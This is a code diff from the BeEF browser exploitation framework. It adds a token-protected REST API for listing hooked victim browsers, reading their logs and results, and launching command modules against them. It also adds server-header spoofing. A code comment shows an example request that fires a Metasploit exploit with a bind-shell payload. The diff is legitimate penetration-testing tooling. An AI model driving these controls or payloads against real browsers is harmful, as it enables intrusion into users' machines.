         @datastore = {'http_headers' => {}} # init the datastore
 
         # get, check and add the http_params to the datastore
@@ -126,6 +126,9 @@ module BeEF
           (print_error 'http_header_value is invalid';return) if not BeEF::Filters.is_valid_command_module_datastore_param?(http_header_value)
           @datastore['http_headers'][http_header_key] = http_header_value # add the checked key and value to the datastore
         }
+        @datastore['results'] = result
+        @datastore['cid'] = command_id
+        @datastore['beefhook'] = beefhook		
       end
 
       # Returns the output of the command. These are the actual instructions sent to the browser.

core/main/configuration.rb

@@ -19,24 +19,31 @@ module BeEF
 
     class Configuration
 
-      include Singleton
+      attr_accessor :config
+
+      # antisnatchor: still a singleton, but implemented by hand because we want to have only one instance
+      # of the Configuration object while having the possibility to specify a parameter to the constructor.
+      # This is  why we don't use anymore the default Ruby implementation -> include Singleton
+      def self.instance()
+        return @@instance
+      end
 
       # Loads the default configuration system
       # @param [String] configuration_file Configuration file to be loaded, by default loads $root_dir/config.yaml
-      def initialize(configuration_file="#{$root_dir}/config.yaml")
-        # argument type checking
-        raise Exception::TypeError, '"configuration_file" needs to be a string' if not configuration_file.string?
-        # test to make sure file exists
-        raise Exception::TypeError, 'Configuration yaml cannot be found' if not File.exist?(configuration_file)
+      def initialize(config)
+        raise Exception::TypeError, '"config" needs to be a string' if not config.string?
+        raise Exception::TypeError, 'Configuration yaml cannot be found' if not File.exist?(config)
         begin
           #open base config
-          @config = self.load(configuration_file)
+          @config = self.load(config)
           # set default value if key? does not exist
           @config.default = nil
+          @@config = config
         rescue Exception => e
           print_error "Fatal Error: cannot load configuration file"
           print_debug e
         end
+        @@instance = self
       end
 
       # Loads yaml file

core/main/console/banners.rb

@@ -14,7 +14,7 @@
 #   limitations under the License.
 #
 module BeEF
-module Extension
+module Core
 module Console
 
 module Banners
@@ -25,8 +25,8 @@ module Banners
     # Prints BeEF's ascii art
     #
     def print_ascii_art
-        if File.exists?('extensions/console/beef.ascii')
-            File.open('extensions/console/beef.ascii', 'r') do |f|
+        if File.exists?('core/main/console/beef.ascii')
+            File.open('core/main/console/beef.ascii', 'r') do |f|
                 while line = f.gets
                     puts line 
                 end

core/main/console/commandline.rb

@@ -14,7 +14,7 @@
 #   limitations under the License.
 #
 module BeEF
-  module Extension
+  module Core
     module Console
       #
       # This module parses the command line argument when running beef.
@@ -24,6 +24,8 @@ module BeEF
         @options = Hash.new
         @options[:verbose] = false
         @options[:resetdb] = false
+        @options[:ascii_art] = false
+        @options[:ext_config] = ""
 
         @already_parsed = false
 
@@ -35,19 +37,27 @@ module BeEF
           return @options if @already_parsed
 
           begin
-          optparse = OptionParser.new do |opts|
-            opts.on('-x', '--reset', 'Reset the database') do
-              @options[:resetdb] = true
+            optparse = OptionParser.new do |opts|
+              opts.on('-x', '--reset', 'Reset the database') do
+                @options[:resetdb] = true
+              end
+
+              opts.on('-v', '--verbose', 'Display debug information') do
+                @options[:verbose] = true
+              end
+
+              opts.on('-a', '--ascii_art', 'Prints BeEF ascii art') do
+                @options[:ascii_art] = true
+              end
+
+              opts.on('-c', '--config FILE', 'Load a different configuration file: if it\'s called custom-config.yaml, git automatically ignores it.') do |f|
+                @options[:ext_config] = f
+              end
             end
 
-            opts.on('-v', '--verbose', 'Display debug information') do
-              @options[:verbose] = true
-            end
-          end
-
-          optparse.parse!
-          @already_parsed = true
-          @options
+            optparse.parse!
+            @already_parsed = true
+            @options
           rescue OptionParser::InvalidOption => e
             puts "Invalid command line option provided. Please run beef --help"
             exit 1

core/main/crypto.rb

@@ -36,6 +36,19 @@ module Core
       # return random hex string
       return OpenSSL::Random.random_bytes(token_length).unpack("H*")[0]
     end
+
+    # Generate a secure random token, 20 chars, used as an auth token for the RESTful API.
+    # After creation it's stored in the BeEF configuration object => conf.get('beef.api_token')
+    # @return [String] Security token
+    def self.api_token
+      config = BeEF::Core::Configuration.instance
+      token_length = 20
+
+      # return random hex string
+      token = OpenSSL::Random.random_bytes(token_length).unpack("H*")[0]
+      config.set('beef.api_token', token)
+      token
+    end
   
   end
 end

core/main/handlers/commands.rb

@@ -55,9 +55,11 @@ module Handlers
       beefhook = get_param(@data, 'beefhook')
       (print_error "BeEFhook is invalid";return) if not BeEF::Filters.is_valid_hook_session_id?(beefhook)
 
+	  result = get_param(@data, 'results')
+
       # @note create the command module to handle the response
       command = @kclass.new(BeEF::Module.get_key_by_class(@kclass))  
-      command.build_callback_datastore(@http_params, @http_header) 
+      command.build_callback_datastore(@http_params, @http_header, result, command_id, beefhook) 
       command.session_id = beefhook 
       if command.respond_to?(:post_execute)
         command.post_execute

core/main/models/commandmodule.rb

@@ -28,8 +28,6 @@ module Models
     property :path, Text, :lazy => false
   
     has n, :commands
-    has 1, :dynamic_command_info
-  
   end
   
 end

core/main/network_stack/handlers/dynamicreconstruction.rb

@@ -54,7 +54,7 @@ module Handlers
               'Expires' => '0',
               'Content-Type' => 'text/javascript',
               'Access-Control-Allow-Origin' => '*',
-              'Access-Control-Allow-Methods' => 'POST'
+              'Access-Control-Allow-Methods' => 'POST, GET'
             }
         )
 

core/main/rest/api.rb

@@ -0,0 +1,44 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+module BeEF
+  module Core
+    module Rest
+
+      module RegisterHooksHandler
+        def self.mount_handler(server)
+          server.mount('/api/hooks', BeEF::Core::Rest::HookedBrowsers.new)
+        end
+      end
+
+      module RegisterModulesHandler
+        def self.mount_handler(server)
+          server.mount('/api/modules', BeEF::Core::Rest::Modules.new)
+        end
+      end
+
+      module RegisterLogsHandler
+        def self.mount_handler(server)
+          server.mount('/api/logs', BeEF::Core::Rest::Logs.new)
+        end
+      end
+
+      BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterHooksHandler, BeEF::API::Server, 'mount_handler')
+      BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterModulesHandler, BeEF::API::Server, 'mount_handler')
+      BeEF::API::Registrar.instance.register(BeEF::Core::Rest::RegisterLogsHandler, BeEF::API::Server, 'mount_handler')
+
+    end
+  end
+end

core/main/rest/handlers/hookedbrowsers.rb

@@ -0,0 +1,77 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+
+module BeEF
+  module Core
+    module Rest
+      class HookedBrowsers < Sinatra::Base
+
+        config = BeEF::Core::Configuration.instance
+        configure do set :show_exceptions, false end
+        not_found do 'Not Found.' end
+
+        before do
+          error 401 unless params[:token] == config.get('beef.api_token')
+          headers 'Content-Type' => 'application/json; charset=UTF-8',
+                  'Pragma' => 'no-cache',
+                  'Cache-Control' => 'no-cache',
+                  'Expires' => '0'
+        end
+
+        # @note Get online and offline hooked browsers details (like name, version, os, ip, port, ...)
+        get '/' do
+          online_hooks = hb_to_json(BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 15)))
+          offline_hooks = hb_to_json(BeEF::Core::Models::HookedBrowser.all(:lastseen.lt => (Time.new.to_i - 15)))
+
+          output = {
+              'hooked-browsers' => {
+                  'online' => online_hooks,
+                  'offline' => offline_hooks
+              }
+          }
+          output.to_json
+        end
+
+        def hb_to_json(hbs)
+          hbs_hash = {}
+          i = 0
+          hbs.each do |hb|
+            hbs_hash[i] = (get_hb_details(hb))
+            i+=1
+          end
+          hbs_hash
+        end
+
+        def get_hb_details(hb)
+           details = BeEF::Extension::Initialization::Models::BrowserDetails
+
+           {
+               'name' => details.get(hb.session, 'BrowserName'),
+               'version' => details.get(hb.session, 'BrowserVersion'),
+               'os' => details.get(hb.session, 'OsName'),
+               'platform' => details.get(hb.session, 'SystemPlatform'),
+               'session' => hb.session,
+               'ip' => hb.ip,
+               'domain' => details.get(hb.session, 'HostName'),
+               'port' => hb.port.to_s,
+               'page_uri' => details.get(hb.session, 'PageURI')
+           }
+        end
+
+      end
+    end
+  end
+end

core/main/rest/handlers/logs.rb

@@ -0,0 +1,74 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+
+module BeEF
+  module Core
+    module Rest
+      class Logs < Sinatra::Base
+
+        config = BeEF::Core::Configuration.instance
+        configure do set :show_exceptions, false end
+        not_found do 'Not Found.' end
+
+        before do
+          error 401 unless params[:token] == config.get('beef.api_token')
+          headers 'Content-Type' => 'application/json; charset=UTF-8',
+                  'Pragma' => 'no-cache',
+                  'Cache-Control' => 'no-cache',
+                  'Expires' => '0'
+        end
+
+        # @note Get all global logs
+        get '/' do
+          logs = BeEF::Core::Models::Log.all()
+          logs_to_json(logs)
+        end
+
+        # @note Get hooked browser logs
+        get '/:session' do
+          hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session])
+          error 401 unless hb != nil
+
+          logs = BeEF::Core::Models::Log.all(:hooked_browser_id => hb.id)
+          logs_to_json(logs)
+        end
+
+        private
+
+        def logs_to_json(logs)
+          logs_json = []
+          count = logs.length
+
+          logs.each do |log|
+            logs_json << {
+                'id' => log.id.to_i,
+                'date' => log.date.to_s,
+                'event' => log.event.to_s,
+                'type' => log.type.to_s
+            }
+          end
+
+          {
+              'logs_count' => count,
+              'logs' => logs_json
+          }.to_json if not logs_json.empty?
+
+        end
+
+      end
+    end
+  end
+end

core/main/rest/handlers/modules.rb

@@ -0,0 +1,147 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+
+module BeEF
+  module Core
+    module Rest
+      class Modules < Sinatra::Base
+
+        config = BeEF::Core::Configuration.instance
+        configure do set :show_exceptions, false end
+        not_found do 'Not Found.' end
+
+        before do
+          error 401 unless params[:token] == config.get('beef.api_token')
+          headers 'Content-Type' => 'application/json; charset=UTF-8',
+                  'Pragma' => 'no-cache',
+                  'Cache-Control' => 'no-cache',
+                  'Expires' => '0'
+        end
+
+        # @note Get all available and enabled modules (id, name, category)
+        get '/' do
+          mods = BeEF::Core::Models::CommandModule.all
+
+          mods_hash = {}
+          i = 0
+          mods.each do |mod|
+            modk = BeEF::Module.get_key_by_database_id(mod.id)
+            next if !BeEF::Module.is_enabled(modk)
+            mods_hash[i] = {
+                'id' => mod.id,
+                'name' => config.get("beef.module.#{modk}.name"),
+                'category' => config.get("beef.module.#{modk}.category")
+            }
+            i+=1
+          end
+          mods_hash.to_json
+        end
+
+        # @note Get the module definition (info, options)
+        get '/:mod_id' do
+          cmd = BeEF::Core::Models::CommandModule.get(params[:mod_id])
+          error 404 unless cmd != nil
+          modk = BeEF::Module.get_key_by_database_id(params[:mod_id])
+          error 404 unless modk != nil
+
+          #todo check if it's possible to also retrieve the TARGETS supported
+          {
+              'name'   => cmd.name,
+              'description' => config.get("beef.module.#{cmd.name}.description"),
+              'category'=> config.get("beef.module.#{cmd.name}.category"),
+              'options'   => BeEF::Module.get_options(modk) #todo => get also payload options..get_payload_options(modk,text)
+          }.to_json
+        end
+
+        # @note Get the module result for the specific executed command
+        #
+        # Example with the Alert Dialog
+        #GET /api/modules/wiJCKAJybcB6aXZZOj31UmQKhbKXY63aNBeODl9kvkIuYLmYTooeGeRD7Xn39x8zOChcUReM3Bt7K0xj/86/1?token=0a931a461d08b86bfee40df987aad7e9cfdeb050 HTTP/1.1
+        #Host: 127.0.0.1:3000
+        #===response (snip)===
+        #HTTP/1.1 200 OK
+        #Content-Type: application/json; charset=UTF-8
+        #
+        #{"date":"1331637093","data":"{\"data\":\"text=michele\"}"}
+        get '/:session/:mod_id/:cmd_id' do
+          hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session])
+          error 401 unless hb != nil
+          cmd = BeEF::Core::Models::Command.first(:hooked_browser_id => hb.id,
+                                                  :command_module_id => params[:mod_id], :id => params[:cmd_id])
+          error 404 unless cmd != nil
+          result = BeEF::Core::Models::Result.first(:hooked_browser_id => hb.id, :command_id => cmd.id)
+          error 404 unless result != nil
+          {
+             'date' => result.date,
+             'data' => result.data
+          }.to_json
+        end
+
+        # @note Fire a new command module to the specified hooked browser.
+        # Return the command_id of the executed module if it has been fired correctly.
+        # Input must be specified in JSON format
+        #
+        # +++ Example with the Alert Dialog: +++
+        #POST /api/modules/wiJCKAJybcB6aXZZOj31UmQKhbKXY63aNBeODl9kvkIuYLmYTooeGeRD7Xn39x8zOChcUReM3Bt7K0xj/86?token=5b17be64715a184d66e563ec9355ee758912a61d HTTP/1.1
+        #Host: 127.0.0.1:3000
+        #Content-Type: application/json; charset=UTF-8
+        #Content-Length: 18
+        #
+        #{"text":"michele"}
+        #===response (snip)===
+        #HTTP/1.1 200 OK
+        #Content-Type: application/json; charset=UTF-8
+        #Content-Length: 35
+        #
+        #{"success":"true","command_id":"1"}
+        #
+        # +++ Example with a Metasploit module (Adobe FlateDecode Stream Predictor 02 Integer Overflow) +++
+        # +++ note that in this case we cannot query BeEF/Metasploit if module execution was successful or not.
+        # +++ this is why there is "command_id":"not_available" in the response
+        #POST /api/modules/wiJCKAJybcB6aXZZOj31UmQKhbKXY63aNBeODl9kvkIuYLmYTooeGeRD7Xn39x8zOChcUReM3Bt7K0xj/236?token=83f13036060fd7d92440432dd9a9b5e5648f8d75 HTTP/1.1
+        #Host: 127.0.0.1:3000
+        #Content-Type: application/json; charset=UTF-8
+        #Content-Length: 81
+        #
+        #{"SRVPORT":"3992", "URIPATH":"77345345345dg", "PAYLOAD":"generic/shell_bind_tcp"}
+        #===response (snip)===
+        #HTTP/1.1 200 OK
+        #Content-Type: application/json; charset=UTF-8
+        #Content-Length: 35
+        #
+        #{"success":"true","command_id":"not_available"}
+        post '/:session/:mod_id' do
+          hb = BeEF::Core::Models::HookedBrowser.first(:session => params[:session])
+          error 401 unless hb != nil
+          modk = BeEF::Module.get_key_by_database_id(params[:mod_id])
+          error 404 unless modk != nil
+
+          request.body.rewind
+          begin
+            data = JSON.parse request.body.read
+            options = []
+            data.each{|k,v| options.push({'name' => k, 'value' => v})}
+            exec_results = BeEF::Module.execute(modk, params[:session], options)
+            exec_results != nil ? '{"success":"true","command_id":"'+exec_results.to_s+'"}' : '{"success":"false"}'
+          rescue Exception => e
+            print_error "Invalid JSON input for module '#{params[:mod_id]}'"
+            error 400 # Bad Request
+          end
+        end
+      end
+    end
+  end
+end

core/main/router/api.rb

@@ -14,23 +14,17 @@
 #   limitations under the License.
 #
 module BeEF
-module Core
-module Models
+  module Core
+    module Router
 
-  class DynamicCommandInfo
-  
-    include DataMapper::Resource
-  
-    storage_names[:default] = 'core_dynamiccommandinfo'
-  
-  	property :id, Serial
-    property :name, Text, :lazy => false
-    property :description, Text, :lazy => false
-  	property :targets, Text, :lazy => false
-  	belongs_to :command_module
-  
+      module RegisterRouterHandler
+        def self.mount_handler(server)
+          server.mount('/', BeEF::Core::Router::Router.new)
+        end
+      end
+
+      BeEF::API::Registrar.instance.register(BeEF::Core::Router::RegisterRouterHandler, BeEF::API::Server, 'mount_handler')
+
+    end
   end
-
 end
-end
-end

core/main/router/router.rb

@@ -0,0 +1,57 @@
+#
+#   Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+
+module BeEF
+  module Core
+    module Router
+
+      #@note This is the main Router parent class.
+      #@note All the HTTP handlers registered on BeEF will extend this class.
+      class Router < Sinatra::Base
+
+        config = BeEF::Core::Configuration.instance
+        configure do set :show_exceptions, false end
+        not_found do 'Not Found' end
+
+        before do
+          # @note Override Server HTTP response header
+          if config.get("beef.http.web_server_imitation.enable")
+             type = config.get("beef.http.web_server_imitation.type")
+             case type
+               when "apache"
+                headers "Server" => "Apache/2.2.3 (CentOS)"
+
+                #todo https://github.com/beefproject/beef/issues/98 if web_server imitation is enabled
+                #todo the 404 response will be something like the following:
+                #<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
+                #<html><head>
+                #<title>404 Not Found</title>
+                #</head><body>
+                #<h1>Not Found</h1>
+                #<p>The requested URL /aaaa was not found on this server.</p>
+                # <hr>
+                # <address>Apache/2.2.3 (CentOS)</address>
+                # </body></html>
+
+               when "iis"
+                headers "Server" => "Microsoft-IIS/7.0"
+             end
+          end
+        end
+      end
+    end
+  end
+end

core/module.rb

@@ -67,11 +67,6 @@ module BeEF
         if class_symbol and class_symbol.respond_to?(:options)
           return class_symbol.options
         end
-        #TODO: do we really need to print this info? At then modules with no options are common,
-        # so I guess we shouldn't print this info even in debug mode
-        #            else
-        #                print_debug "Module '#{mod}', no options method defined"
-        #            end
       end
       return []
     end
@@ -434,22 +429,22 @@ module BeEF
     # @param [String] mod module key
     # @param [String] hbsession hooked browser session
     # @param [Array] opts array of module execute options (see #get_options)
-    # @return [Boolean] whether or not the BeEF system executed the module
+    # @return [Fixnum] the command_id associated to the module execution when info is persisted. nil if there are errors.
     # @note The return value of this function does not specify if the module was successful, only that it was executed within the framework
     def self.execute(mod, hbsession, opts=[])
       if not (self.is_present(mod) and self.is_enabled(mod))
         print_error "Module not found '#{mod}'. Failed to execute module."
-        return false
+        return nil
       end
       if BeEF::API::Registrar.instance.matched?(BeEF::API::Module, 'override_execute', [mod, nil,nil])
         BeEF::API::Registrar.instance.fire(BeEF::API::Module, 'override_execute', mod, hbsession,opts)
-        # @note We return true by default as we cannot determine the correct status if multiple API hooks have been called
-        return true
+        # @note We return not_nil by default as we cannot determine the correct status if multiple API hooks have been called
+        return 'not_available' # @note using metasploit, we cannot know if the module execution was successful or not
       end
       hb = BeEF::HBManager.get_by_session(hbsession)
       if not hb
         print_error "Could not find hooked browser when attempting to execute module '#{mod}'"
-        return false
+        return nil
       end
       self.check_hard_load(mod)
       command_module = self.get_definition(mod).new(mod)
@@ -457,12 +452,12 @@ module BeEF
         command_module.pre_execute
       end
       h = self.merge_options(mod, [])
-      c = BeEF::Core::Models::Command.new(:data => self.merge_options(mod, opts).to_json,
+      c = BeEF::Core::Models::Command.create(:data => self.merge_options(mod, opts).to_json,
                                           :hooked_browser_id => hb.id,
                                           :command_module_id => BeEF::Core::Configuration.instance.get("beef.module.#{mod}.db.id"),
                                           :creationdate => Time.new.to_i
-      ).save
-      return true
+      )
+      return c.id
     end
 
     # Merges default module options with array of custom options

core/ruby/print.rb

@@ -29,10 +29,9 @@ end
 # Function used to print debug information
 # @param [String] s String to be printed
 # @note This function will only print messages if the debug flag is set to true
-# @todo Once the console extension has been merged into the core, remove the extension checks. 
 def print_debug(s)
   config = BeEF::Core::Configuration.instance
-  if config.get('beef.debug') || (BeEF::Extension.is_loaded('console') && BeEF::Extension::Console.verbose?)
+  if config.get('beef.debug') || BeEF::Core::Console::CommandLine.parse[:verbose]
     puts Time.now.localtime.strftime("[%k:%M:%S]")+'[>]'.yellow+' '+s.to_s
   end
 end

extensions/admin_ui/controllers/modules/modules.rb

@@ -208,36 +208,6 @@ class Modules < BeEF::Extension::AdminUI::HttpController
       summary_grid_hash['results'].push(page_name_row) # add the row
     end
     
-    # set and add the internal ip address
-    internal_ip = BD.get(zombie_session, 'InternalIP')
-    if not internal_ip.nil?
-      encoded_internal_ip = CGI.escapeHTML(internal_ip)
-      encoded_internal_ip_hash = { 'Internal IP' => encoded_internal_ip }
-      
-      page_name_row = {
-        'category' => 'Host',
-        'data' => encoded_internal_ip_hash,
-        'from' => 'Initialization'
-      }
-      
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-    
-    # set and add the internal hostname
-    internal_hostname = BD.get(zombie_session, 'InternalHostname')
-    if not internal_hostname.nil?
-      encoded_internal_hostname = CGI.escapeHTML(internal_hostname)
-      encoded_internal_hostname_hash = { 'Internal Hostname' => encoded_internal_hostname }
-      
-      page_name_row = {
-        'category' => 'Host',
-        'data' => encoded_internal_hostname_hash,
-        'from' => 'Initialization'
-      }
-      
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
     # set and add the System Platform
     system_platform = BD.get(zombie_session, 'SystemPlatform')
     if not system_platform.nil?
@@ -636,7 +606,8 @@ class Modules < BeEF::Extension::AdminUI::HttpController
         def2.push({'name' => k, 'value' => v})
     }
     # End hack
-    @body = (BeEF::Module.execute(mod_key, zombie_session, def2)) ? '{success: true}' : '{success: false}'
+    exec_results = BeEF::Module.execute(mod_key, zombie_session, def2)
+    @body = (exec_results != nil) ? '{success: true}' : '{success: false}'
   end
   
   # Re-execute an command_module to a zombie.

extensions/admin_ui/controllers/xssrays/xssrays.rb

@@ -80,7 +80,7 @@ class Xssrays < BeEF::Extension::AdminUI::HttpController
       )
       xssrays_scan.save
 
-      print_info("[XSSRAYS] Starting XSSRays on HB with ip [#{hooked_browser.ip.to_s}], hooked on domain [#{hooked_browser.domain.to_s}]")
+      print_info("[XSSRAYS] Starting XSSRays [ip:#{hooked_browser.ip.to_s}], hooked domain [#{hooked_browser.domain.to_s}]")
     end
 
    end
@@ -116,7 +116,7 @@ class Xssrays < BeEF::Extension::AdminUI::HttpController
       )
       xssrays_scan.save
 
-      print_info("[XSSRAYS] Starting XSSRays on HB with ip [#{hooked_browser.ip.to_s}], hooked on domain [#{hooked_browser.domain.to_s}]")
+      print_info("[XSSRAYS] Starting XSSRays [ip:#{hooked_browser.ip.to_s}], hooked domain [#{hooked_browser.domain.to_s}]")
     end
    end
 end
@@ -124,4 +124,4 @@ end
 end
 end
 end
-end
+end

extensions/console/extension.rb

@@ -24,39 +24,8 @@ module Console
   #
   @short_name = @full_name = 'console'
   @description = 'console environment to manage beef'
-  
-  #
-  # Returns true of the verbose option has been enabled for the console.
-  # False if not.
-  #
-  #  Example:
-  #
-  #   $ ruby console.rb -v
-  #     BeEF::Extension::Console.verbose? # => true
-  #
-  #   $ ruby console.rb
-  #     BeEF::Extension::Console.verbose? # => false
-  #
-  def self.verbose?
-    CommandLine.parse[:verbose]
-  end
-  
-  #
-  # Returns true if we should reset the database. False if not.
-  #
-  #   $ ruby console.rb -x
-  #     BeEF::Extension::Console.resetdb? # => true
-  #
-  #   $ ruby console.rb
-  #     BeEF::Extension::Console.resetdb? # => false
-  #
-  def self.resetdb?
-    CommandLine.parse[:resetdb]
-  end
-  
+
 end
 end
 end
 
-require 'extensions/console/banners'
-require 'extensions/console/commandline'

extensions/console/lib/command_dispatcher/command.rb

@@ -56,7 +56,7 @@ class Command
     print_line("Module parameters:")
 
     driver.interface.cmd['Data'].each{|data|
-      print_line(data['name'] + " => \"" + data['value'] + "\" # this is the " + data['ui_label'] + " parameter")
+      print_line(data['name'] + " => \"" + data['value'].to_s + "\" # this is the " + data['ui_label'] + " parameter")
     } if not driver.interface.cmd['Data'].nil?
   end
   
@@ -153,7 +153,9 @@ class Command
         print_line("Results retrieved: " + Time.at(output[0]['date'].to_i).to_s)
         print_line("")
         print_line("Response:")
-        print_line(output[0]['data']['data'].to_s)
+        output.each do |op|
+          print_line(op['data']['data'].to_s)
+        end
       end
     end
   end

extensions/console/lib/command_dispatcher/core.rb

@@ -31,6 +31,7 @@ class Core
       "back"    => "Move back from the current context",
       "exit"    => "Exit the console",
       "help"    => "Help menu",
+      "irb"     => "Drops into an interactive Ruby environment",
       "jobs"    => "Print jobs",
       "online"  => "List online hooked browsers",
       "offline" => "List previously hooked browsers",
@@ -236,6 +237,28 @@ class Core
     print_status("Target a particular online, hooked browser")
     print_status("  Usage: target <id>")
   end
+
+  def cmd_irb(*args)
+    @@bare_opts.parse(args) {|opt, idx, val|
+      case opt
+        when "-h"
+          cmd_irb_help
+          return false
+        end
+      }
+
+    print_status("Starting IRB shell...\n")
+
+    begin
+      Rex::Ui::Text::IrbShell.new(binding).run
+    rescue
+      print_error("Error during IRB: #{$!}\n\n#{$@.join("\n")}")
+    end
+  end
+
+  def cmd_irb_help(*args)
+    print_status("Load the IRB, Interative Ruby Shell")
+  end
   
   def cmd_review(*args)
     @@bare_opts.parse(args) {|opt, idx, val|

extensions/console/lib/shellinterface.rb

@@ -195,7 +195,7 @@ class ShellInterface
         def2.push({'name' => k, 'value' => v})
     }
     # End hack
-    if BeEF::Module.execute(mod_key, self.targetsession.to_s, def2) == true
+    if BeEF::Module.execute(mod_key, self.targetsession.to_s, def2) != nil
       return true
     else
       return false
@@ -417,21 +417,6 @@ class ShellInterface
       summary_grid_hash['results'].push(page_name_row) # add the row
     end
     
-    # set and add the internal ip address
-    internal_ip = BD.get(self.targetsession, 'InternalIP')
-    if not internal_ip.nil?
-      encoded_internal_ip = CGI.escapeHTML(internal_ip)
-      encoded_internal_ip_hash = { 'Internal IP' => encoded_internal_ip }
-      
-      page_name_row = {
-        'category' => 'Host',
-        'data' => encoded_internal_ip_hash,
-        'from' => 'Initialization'
-      }
-
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-
     # set and add the System Platform
     system_platform = BD.get(self.targetsession, 'SystemPlatform')
     if not system_platform.nil?
@@ -447,21 +432,6 @@ class ShellInterface
       summary_grid_hash['results'].push(page_name_row) # add the row
     end
 
-    # set and add the internal hostname
-    internal_hostname = BD.get(self.targetsession, 'InternalHostname')
-    if not internal_hostname.nil?
-      encoded_internal_hostname = CGI.escapeHTML(internal_hostname)
-      encoded_internal_hostname_hash = { 'Internal Hostname' => encoded_internal_hostname }
-      
-      page_name_row = {
-        'category' => 'Host',
-        'data' => encoded_internal_hostname_hash,
-        'from' => 'Initialization'
-      }
-      
-      summary_grid_hash['results'].push(page_name_row) # add the row
-    end
-   
     # set and add the zombie screen size and color depth
     screen_params = BD.get(self.targetsession, 'ScreenParams')
     if not screen_params.nil?

extensions/demos/html/checkJava.java

@@ -0,0 +1,19 @@
+import java.io.*;  
+import java.util.*;
+import java.net.*;
+import java.applet.*;
+
+// Keith Lee
+// Twitter: @keith55
+// http://milo2012.wordpress.com
+// keith.lee2012[at]gmail.com
+
+public class checkJava extends Applet{  
+ 	public static int results = 0;
+	public void init() {
+	}
+        public int getInfo() {
+		results = 1;
+		return results;
+	}
+}	

extensions/initialization/handler.rb

@@ -169,22 +169,6 @@ module BeEF
             self.err_msg "Invalid system platform returned from the hook browser's initial connection."
           end
 
-          # get and store the internal ip address
-          internal_ip = get_param(@data['results'], 'InternalIP')
-          if BeEF::Filters.is_valid_ip?(internal_ip)
-            BD.set(session_id, 'InternalIP', internal_ip)
-          else
-            self.err_msg "Invalid internal IP address returned from the hook browser's initial connection."
-          end
-
-          # get and store the internal hostname
-          internal_hostname = get_param(@data['results'], 'InternalHostname')
-          if BeEF::Filters.is_valid_hostname?(host_name)
-            BD.set(session_id, 'InternalHostname', internal_hostname)
-          else
-            self.err_msg "Invalid internal hostname returned from the hook browser's initial connection."
-          end
-
           # get and store the hooked browser type
           browser_type = get_param(@data['results'], 'BrowserType')
           if BeEF::Filters.is_valid_browsertype?(browser_type)

extensions/metasploit/api.rb

@@ -14,166 +14,166 @@
 #   limitations under the License.
 #
 module BeEF
-module Extension
-module Metasploit
-module API  
+  module Extension
+    module Metasploit
+      module API
 
-  module MetasploitHooks
-    
-    BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Modules, 'post_soft_load')
-    
-    # Load modules from metasploit just after all other module config is loaded
-    def self.post_soft_load
-        msf = BeEF::Extension::Metasploit::RpcClient.instance                
-        if msf.login
-            msf_module_config = {}
-            path = BeEF::Core::Configuration.instance.get('beef.extension.metasploit.path')
-            if not BeEF::Extension::Console.resetdb? and File.exists?("#{path}msf-exploits.cache")
+        module MetasploitHooks
+
+          BeEF::API::Registrar.instance.register(BeEF::Extension::Metasploit::API::MetasploitHooks, BeEF::API::Modules, 'post_soft_load')
+
+          # Load modules from metasploit just after all other module config is loaded
+          def self.post_soft_load
+            msf = BeEF::Extension::Metasploit::RpcClient.instance
+            if msf.login
+              msf_module_config = {}
+              path = BeEF::Core::Configuration.instance.get('beef.extension.metasploit.path')
+              if not BeEF::Core::Console::CommandLine.parse[:resetdb] and File.exists?("#{path}msf-exploits.cache")
